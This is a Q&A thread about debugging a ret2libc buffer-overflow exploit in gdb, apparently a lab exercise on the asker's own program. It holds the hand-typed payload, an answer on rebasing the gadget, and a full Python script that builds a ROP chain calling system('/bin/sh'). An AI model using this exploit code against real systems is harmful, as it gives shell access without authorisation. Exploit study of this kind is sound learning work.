Tags: python, c, input, gdb, exploit

gdb reads wrong input (stdin) values


I input the following in gdb for ret2libc.

(gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kali/Desktop/c_system/a < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')

When I checked the memory, it displayed wrong values after 0x267de:

(gdb) x/4g $rbp
0x7fffffffe190: 0x4242424242424242      0x00000000000267de
0x7fffffffe1a0: 0x007fff370cf7b1ac      0x007ffff7e408a000

All the addresses are correct, and finally the program ended in a segmentation fault.

AAAAAAAAAABBBBBBBB�g


Program received signal SIGSEGV, Segmentation fault.
0x00000000000267de in ?? ()

The gadget chosen was pop rdi; ret, which is at 0x267de; /bin/sh is at 0x7ffff7f7b1ac and system() is at 0x7ffff7e408a0. gets() was used to input the buffer, which is 10 bytes long, and no other variables are present in the source code.

Why are wrong values displayed?


Solution

  • As @Mark Plotnick said, 0x267de was the offset of the gadget pop rdi; ret. So in order to find the correct address of the gadget, the offset must be added to the base address. I used radare2 to find the gadget, loading the path of libc as the binary path. This implies that the base address of libc is the base address of the gadget. To find the base address of libc I used info proc map in gdb. There are also other ways to find the base address of libc. When this address was used, the address display issue was resolved.
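Two things go wrong in the posted command, and both are avoided by building the payload in a script instead of a hand-typed print(): the gadget value is a file offset that has to be rebased, as the answer says, and the third quadword is typed as \xac\xb1\xf7\f7\xff\x7f\x00\x00, where \f7 is a form feed (0x0c) followed by the digit 7 (0x37) instead of the byte \xf7. That is exactly what the dump shows at 0x7fffffffe1a0: 0x007fff370cf7b1ac, with the next word shifted by one byte. The script below is an added example, not code from the question or the answer. It parses the table gdb prints for info proc map to get the libc base, adds the gadget offset from the question, packs every address with struct so no escape can be mistyped, and exposes a helper that reports how many bytes an escape string really produces. The info proc map excerpt, its libc base 0x7ffff7dd5000 and the process id are constructed for the example; the other addresses and offsets are the ones from the question.

```python
import struct
import sys

# Values copied from the question. The gadget value is a file offset inside
# libc (what radare2 reports when run on libc.so itself); the other two are
# runtime addresses the asker already had.
POP_RDI_RET_OFFSET = 0x267de
BIN_SH_ADDR = 0x7ffff7f7b1ac
SYSTEM_ADDR = 0x7ffff7e408a0

# Layout from the question: gets() into a 10-byte buffer, then the 8-byte
# saved rbp, then the return address.
BUF_LEN = 10
SAVED_RBP_LEN = 8

# Constructed excerpt of gdb's `info proc map` output. The libc base here
# (0x7ffff7dd5000) and the pid are invented for the example, not taken from
# the question; on a real target paste the real table instead.
SAMPLE_PROC_MAP = """\
process 4242
Mapped address spaces:

          Start Addr           End Addr       Size     Offset  Perms  objfile
      0x555555554000     0x555555555000     0x1000        0x0  r--p   /home/kali/Desktop/c_system/a
      0x7ffff7dd5000     0x7ffff7dfb000    0x26000        0x0  r--p   /usr/lib/x86_64-linux-gnu/libc.so.6
      0x7ffff7dfb000     0x7ffff7f70000   0x175000    0x26000  r-xp   /usr/lib/x86_64-linux-gnu/libc.so.6
      0x7ffff7ffd000     0x7ffff7fff000     0x2000        0x0  rw-p   /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
"""


def libc_base_from_proc_map(proc_map_text, libc_name="libc.so"):
    """Lowest Start Addr of any mapping whose objfile contains libc_name.

    Splits on whitespace so it works with or without the Perms column that
    newer gdb versions print."""
    bases = []
    for line in proc_map_text.splitlines():
        parts = line.split()
        if len(parts) < 5 or not parts[0].startswith("0x"):
            continue  # header, blank line or "process N"
        if libc_name in parts[-1]:
            bases.append(int(parts[0], 16))
    if not bases:
        raise ValueError("no mapping for %s in info proc map output" % libc_name)
    return min(bases)


def p64(value):
    """Little-endian 8-byte pack; struct refuses values that do not fit."""
    return struct.pack("<Q", value)


def build_payload(libc_base):
    """padding | saved rbp | pop rdi; ret | "/bin/sh" | system()"""
    pop_rdi_ret = libc_base + POP_RDI_RET_OFFSET
    return (b"A" * BUF_LEN
            + b"B" * SAVED_RBP_LEN
            + p64(pop_rdi_ret)
            + p64(BIN_SH_ADDR)
            + p64(SYSTEM_ADDR))


def escape_string_bytes(s):
    """Bytes a hand-typed escape string really yields (latin-1 keeps each
    \\xNN as one byte). A word meant to be 8 bytes must come back as 8."""
    return s.encode("latin-1")


def words(payload, skip=BUF_LEN + SAVED_RBP_LEN):
    """Qwords after the padding, as gdb's x/g would display them."""
    tail = payload[skip:]
    usable = len(tail) - len(tail) % 8
    return [struct.unpack_from("<Q", tail, i)[0] for i in range(0, usable, 8)]


if __name__ == "__main__":
    # Usage: python3 payload.py [libc_base_hex] > payload.bin
    # then in gdb: r < payload.bin
    if len(sys.argv) > 1:
        base = int(sys.argv[1], 16)
    else:
        base = libc_base_from_proc_map(SAMPLE_PROC_MAP)
    sys.stdout.buffer.write(build_payload(base))
```

Writing the payload to a file and redirecting it with r < payload.bin keeps the bytes exactly as packed; with the question's python -c print() form, a Python 3 interpreter would additionally UTF-8 encode every byte above 0x7f into two bytes, so check which python the shell resolves to. If the rebased gadget lands correctly but the process still faults inside libc, stack alignment before the call to system() is the usual next thing to check.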